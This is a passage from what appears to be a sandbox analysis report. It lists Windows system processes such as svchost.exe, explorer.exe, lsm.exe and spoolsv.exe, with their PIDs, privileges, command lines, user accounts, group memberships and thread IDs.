239 os_tid = 0x204 Thread: id = 240 os_tid = 0x208 Thread: id = 241 os_tid = 0x20c Thread: id = 315 os_tid = 0x33c Thread: id = 369 os_tid = 0xf4 Thread: id = 393 os_tid = 0x100 Process: id = "28" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0xda81000" os_pid = "0x1c8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 227 os_tid = 0x1cc Thread: id = 255 os_tid = 0x248 Thread: id = 284 os_tid = 0x2b8 Thread: id = 286 os_tid = 0x2c8 Thread: id = 289 os_tid = 0x2d4 Thread: id = 290 os_tid = 0x2d8 Thread: id = 291 os_tid = 0x2dc Thread: id = 293 os_tid = 0x2e4 Thread: id = 296 os_tid = 0x2f0 Thread: id = 308 os_tid = 0x304 Thread: id = 622 os_tid = 0x7b0 Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xe5ec000" os_pid = "0x240" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007265" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 254 os_tid = 0x244 Thread: id = 257 os_tid = 0x250 Thread: id = 258 os_tid = 0x254 Thread: id = 259 os_tid = 0x258 Thread: id = 260 os_tid = 0x25c Thread: id = 261 os_tid = 0x260 Thread: id = 262 os_tid = 0x264 Thread: id = 263 os_tid = 0x268 Thread: id = 264 os_tid = 0x26c Thread: id = 266 os_tid = 0x270 Thread: id = 267 os_tid = 0x274 Thread: id = 268 os_tid = 0x278 Thread: id = 271 os_tid = 0x284 Thread: id = 274 os_tid = 0x294 Thread: id = 275 os_tid = 0x298 Thread: id = 278 os_tid = 0x2a4 Thread: id = 316 os_tid = 0x338 Thread: id = 511 os_tid = 0x5dc Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xd3fd000" os_pid = "0x288" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b8b5" [0xc000000f], "LOCAL" [0x7] Thread: id = 272 os_tid = 0x28c Thread: id = 273 os_tid = 0x290 Thread: id = 276 os_tid = 0x29c Thread: id = 277 os_tid = 0x2a0 Thread: id = 279 os_tid = 0x2a8 Thread: id = 280 os_tid = 0x2ac Thread: id = 281 os_tid = 0x2b0 Thread: id = 282 os_tid = 0x2b4 Thread: id = 542 os_tid = 0x658 Thread: id = 543 os_tid = 0x660 Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xcc0b000" os_pid = "0x2bc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bb93" [0xc000000f], "LOCAL" [0x7] Thread: id = 285 os_tid = 0x2c0 Thread: id = 288 os_tid = 0x2cc Thread: id = 292 os_tid = 0x2e0 Thread: id = 294 os_tid = 0x2e8 Thread: id = 295 os_tid = 0x2ec Thread: id = 313 os_tid = 0x330 Thread: id = 314 os_tid = 0x334 Thread: id = 319 os_tid = 0x34c Thread: id = 323 os_tid = 0x35c Thread: id = 324 os_tid = 0x360 Thread: id = 325 os_tid = 0x364 Thread: id = 337 os_tid = 0x398 Thread: id = 338 os_tid = 0x39c Thread: id = 339 os_tid = 0x3a0 Thread: id = 342 os_tid = 0x3b0 Thread: id = 344 os_tid = 0x3b8 Thread: id = 395 os_tid = 0x138 Thread: id = 399 os_tid = 0x40c Thread: id = 403 os_tid = 0x418 Thread: id = 407 os_tid = 0x434 Thread: id = 412 os_tid = 0x448 Thread: id = 413 os_tid = 0x44c Thread: id = 457 os_tid = 0x508 Thread: id = 467 os_tid = 0x528 Thread: id = 469 os_tid = 0x534 Thread: id = 470 os_tid = 0x538 Thread: id = 477 os_tid = 0x554 Thread: id = 480 os_tid = 0x564 Thread: id = 640 os_tid = 0x204 Thread: id = 648 os_tid = 0x440 Process: id = "32" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x60400000" os_pid = "0x2f8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x180" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 298 os_tid = 0x2fc Thread: id = 300 os_tid = 0x308 Thread: id = 301 os_tid = 0x30c Thread: id = 302 os_tid = 0x310 Thread: id = 304 os_tid = 0x318 Thread: id = 305 os_tid = 0x31c Thread: id = 307 os_tid = 0x320 Thread: id = 310 os_tid = 0x324 Thread: id = 311 os_tid = 0x328 Thread: id = 312 os_tid = 0x32c Thread: id = 586 os_tid = 0x71c Process: id = "33" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8e12000" os_pid = "0x340" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d044" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 317 os_tid = 0x344 Thread: id = 318 os_tid = 0x348 Thread: id = 320 os_tid = 0x350 Thread: id = 321 os_tid = 0x354 Thread: id = 322 os_tid = 0x358 Thread: id = 328 os_tid = 0x374 Thread: id = 329 os_tid = 0x378 Thread: id = 330 os_tid = 0x37c Thread: id = 334 os_tid = 0x38c Thread: id = 335 os_tid = 0x390 Thread: id = 347 os_tid = 0x3c4 Thread: id = 349 os_tid = 0x3cc Thread: id = 352 os_tid = 0x3dc Thread: id = 354 os_tid = 0x3e4 Thread: id = 356 os_tid = 0x3ec Thread: id = 357 os_tid = 0x3f0 Thread: id = 367 os_tid = 0x104 Thread: id = 368 os_tid = 0x10c Thread: id = 391 os_tid = 0x398 Thread: id = 392 os_tid = 0x3c8 Thread: id = 396 os_tid = 0x1c4 Thread: id = 397 os_tid = 0x100 Thread: id = 493 os_tid = 0x598 Thread: id = 496 os_tid = 0x5a4 Thread: id = 497 os_tid = 0x5a8 Thread: id = 498 os_tid = 0x5ac Thread: id = 499 os_tid = 0x5b0 Thread: id = 528 os_tid = 0x61c Thread: id = 529 os_tid = 0x628 Thread: id = 536 os_tid = 0x644 Thread: id = 538 os_tid = 0x64c Process: id = "34" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2461e000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d24f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 326 os_tid = 0x36c Thread: id = 327 os_tid = 0x370 Thread: id = 331 os_tid = 0x380 Thread: id = 332 os_tid = 0x384 Thread: id = 333 os_tid = 0x388 Thread: id = 336 os_tid = 0x394 Thread: id = 348 os_tid = 0x3c8 Thread: id = 350 os_tid = 0x3d0 Thread: id = 353 os_tid = 0x3e0 Thread: id = 355 os_tid = 0x3e8 Thread: id = 358 os_tid = 0x3f4 Thread: id = 373 os_tid = 0x138 Thread: id = 374 os_tid = 0x12c Thread: id = 375 os_tid = 0x124 Thread: id = 384 os_tid = 0x200 Thread: id = 385 os_tid = 0x258 Thread: id = 418 os_tid = 0x460 Thread: id = 420 os_tid = 0x468 Thread: id = 421 os_tid = 0x46c Thread: id = 422 os_tid = 0x470 Thread: id = 423 os_tid = 0x474 Thread: id = 427 os_tid = 0x490 Thread: id = 449 os_tid = 0x408 Thread: id = 450 os_tid = 0x398 Thread: id = 500 os_tid = 0x5b4 Thread: id = 501 os_tid = 0x5b8 Thread: id = 502 os_tid = 0x5bc Thread: id = 503 os_tid = 0x5c0 Thread: id = 505 os_tid = 0x5c4 Thread: id = 506 os_tid = 0x5c8 Thread: id = 507 os_tid = 0x5cc Thread: id = 508 os_tid = 0x5d0 Thread: id = 509 os_tid = 0x5d4 Thread: id = 510 os_tid = 0x5d8 Thread: id = 512 os_tid = 0x5e0 Thread: id = 515 os_tid = 0x5e8 Thread: id = 517 os_tid = 0x5f0 Thread: id = 520 os_tid = 0x5fc Thread: id = 523 os_tid = 0x608 Thread: id = 524 os_tid = 0x60c Thread: id = 527 os_tid = 0x618 Thread: id = 548 os_tid = 0x674 Thread: id = 549 os_tid = 0x678 Thread: id = 550 os_tid = 0x67c Thread: id = 552 os_tid = 0x688 Thread: id = 553 os_tid = 0x68c Thread: id = 562 os_tid = 0x6ac Thread: id = 563 os_tid = 0x6b0 Thread: id = 565 os_tid = 0x6b8 Thread: id = 566 os_tid = 0x6bc Thread: id = 587 os_tid = 0x720 Thread: id = 588 os_tid = 0x724 Thread: id = 589 os_tid = 0x72c Thread: id = 590 os_tid = 0x730 Thread: id = 591 os_tid = 0x738 Thread: id = 592 os_tid = 0x73c Process: id = "35" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x79f0000" os_pid = "0x3a4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x2bc" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2cc" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bb93" [0xc000000f], "LOCAL" [0x7] Thread: id = 340 os_tid = 0x3a8 Thread: id = 341 os_tid = 0x3ac Thread: id = 343 os_tid = 0x3b4 Thread: id = 345 os_tid = 0x3bc Thread: id = 346 os_tid = 0x3c0 Process: id = "36" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9227000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1ed" [0xc000000f], "LOCAL" [0x7] Thread: id = 359 os_tid = 0x3fc Thread: id = 360 os_tid = 0xc8 Thread: id = 361 os_tid = 0xcc Thread: id = 362 os_tid = 0xfc Thread: id = 363 os_tid = 0xf8 Thread: id = 371 os_tid = 0x108 Thread: id = 372 os_tid = 0x134 Thread: id = 398 os_tid = 0x404 Thread: id = 488 os_tid = 0x584 Thread: id = 489 os_tid = 0x588 Thread: id = 525 os_tid = 0x610 Thread: id = 532 os_tid = 0x634 Thread: id = 534 os_tid = 0x63c Thread: id = 539 os_tid = 0x650 Thread: id = 546 os_tid = 0x66c Thread: id = 547 os_tid = 0x670 Thread: id = 557 os_tid = 0x698 Thread: id = 564 os_tid = 0x6b4 Thread: id = 621 os_tid = 0x7ac Process: id = "37" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x783d000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d24f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 376 os_tid = 0x13c Thread: id = 377 os_tid = 0x168 Thread: id = 378 os_tid = 0x154 Thread: id = 379 os_tid = 0x150 Thread: id = 380 os_tid = 0x19c Thread: id = 381 os_tid = 0x204 Thread: id = 382 os_tid = 0x1c4 Process: id = "38" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x6c90000" os_pid = "0x284" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x180" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 386 os_tid = 0x2a0 Thread: id = 568 os_tid = 0x6c0 Thread: id = 569 os_tid = 0x6c4 Thread: id = 650 os_tid = 0x45c Thread: id = 652 os_tid = 0x464 Process: id = "39" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0xed58000" os_pid = "0x2f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x284" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 387 os_tid = 0x358 Thread: id = 388 os_tid = 0x374 Thread: id = 390 os_tid = 0x39c Thread: id = 574 os_tid = 0x6e0 Thread: id = 585 os_tid = 0x718 Thread: id = 596 os_tid = 0x744 Thread: id = 597 os_tid = 0x748 Thread: id = 598 os_tid = 0x74c Thread: id = 599 os_tid = 0x750 Thread: id = 601 os_tid = 0x754 Thread: id = 602 os_tid = 0x758 Thread: id = 603 os_tid = 0x75c Thread: id = 604 os_tid = 0x764 Thread: id = 605 os_tid = 0x768 Thread: id = 606 os_tid = 0x76c Thread: id = 607 os_tid = 0x770 Thread: id = 608 os_tid = 0x774 Thread: id = 609 os_tid = 0x778 Thread: id = 610 os_tid = 0x77c Thread: id = 612 os_tid = 0x794 Thread: id = 613 os_tid = 0x798 Thread: id = 617 os_tid = 0x79c Thread: id = 618 os_tid = 0x7a0 Thread: id = 619 os_tid = 0x7a4 Thread: id = 620 os_tid = 0x7a8 Thread: id = 625 os_tid = 0x7bc Thread: id = 627 os_tid = 0x7c4 Thread: id = 629 os_tid = 0x7d0 Thread: id = 630 os_tid = 0x7d4 Thread: id = 633 os_tid = 0x7e0 Thread: id = 635 os_tid = 0x7ec Thread: id = 643 os_tid = 0x19c Thread: id = 645 os_tid = 0x154 Thread: id = 646 os_tid = 0x150 Thread: id = 649 os_tid = 0x420 Thread: id = 653 os_tid = 0x44c Process: id = "40" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0xf64000" os_pid = "0x130" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x340" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 394 os_tid = 0xf8 Thread: id = 400 os_tid = 0x410 Thread: id = 401 os_tid = 0x414 Thread: id = 402 os_tid = 0x41c Thread: id = 404 os_tid = 0x420 Thread: id = 611 os_tid = 0x760 Thread: id = 614 os_tid = 0x780 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7342000" os_pid = "0x428" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:000107b4" [0xc000000f], "LOCAL" [0x7] Thread: id = 405 os_tid = 0x42c Thread: id = 406 os_tid = 0x430 Thread: id = 408 os_tid = 0x438 Thread: id = 409 os_tid = 0x43c Thread: id = 410 os_tid = 0x440 Thread: id = 411 os_tid = 0x444 Thread: id = 414 os_tid = 0x450 Thread: id = 415 os_tid = 0x454 Thread: id = 416 os_tid = 0x458 Thread: id = 417 os_tid = 0x45c Thread: id = 419 os_tid = 0x464 Thread: id = 451 os_tid = 0x4f0 Thread: id = 461 os_tid = 0x514 Thread: id = 471 os_tid = 0x53c Thread: id = 472 os_tid = 0x540 Thread: id = 478 os_tid = 0x558 Thread: id = 479 os_tid = 0x560 Thread: id = 485 os_tid = 0x578 Thread: id = 487 os_tid = 0x580 Thread: id = 490 os_tid = 0x58c Thread: id = 491 os_tid = 0x590 Thread: id = 492 os_tid = 0x594 Thread: id = 504 os_tid = 0x55c Thread: id = 545 os_tid = 0x668 Thread: id = 641 os_tid = 0x41c Thread: id = 642 os_tid = 0x424 Process: id = "42" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x8867000" os_pid = "0x484" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:000113ff" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 425 os_tid = 0x488 Thread: id = 428 os_tid = 0x494 Thread: id = 429 os_tid = 0x498 Thread: id = 430 os_tid = 0x49c Thread: id = 431 os_tid = 0x4a0 Thread: id = 433 os_tid = 0x4ac Process: id = "43" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x596a000" os_pid = "0x4a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 432 os_tid = 0x4a8 Thread: id = 435 os_tid = 0x4b8 Thread: id = 439 os_tid = 0x4c8 Thread: id = 441 os_tid = 0x4d0 Thread: id = 444 os_tid = 0x4dc Thread: id = 445 os_tid = 0x4e0 Thread: id = 446 os_tid = 0x4e4 Thread: id = 448 os_tid = 0x4ec Thread: id = 481 os_tid = 0x568 Thread: id = 482 os_tid = 0x56c Thread: id = 484 os_tid = 0x574 Thread: id = 486 os_tid = 0x57c Thread: id = 572 os_tid = 0x6d8 Thread: id = 573 os_tid = 0x6dc Thread: id = 576 os_tid = 0x6ec Thread: id = 600 os_tid = 0x714 Process: id = "44" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xba5000" os_pid = "0x4b0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:000116ff" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 434 os_tid = 0x4b4 Thread: id = 437 os_tid = 0x4c0 Thread: id = 440 os_tid = 0x4cc Thread: id = 442 os_tid = 0x4d4 Thread: id = 443 os_tid = 0x4d8 Thread: id = 447 os_tid = 0x4e8 Thread: id = 452 os_tid = 0x4f4 Thread: id = 454 os_tid = 0x4fc Thread: id = 455 os_tid = 0x500 Thread: id = 456 os_tid = 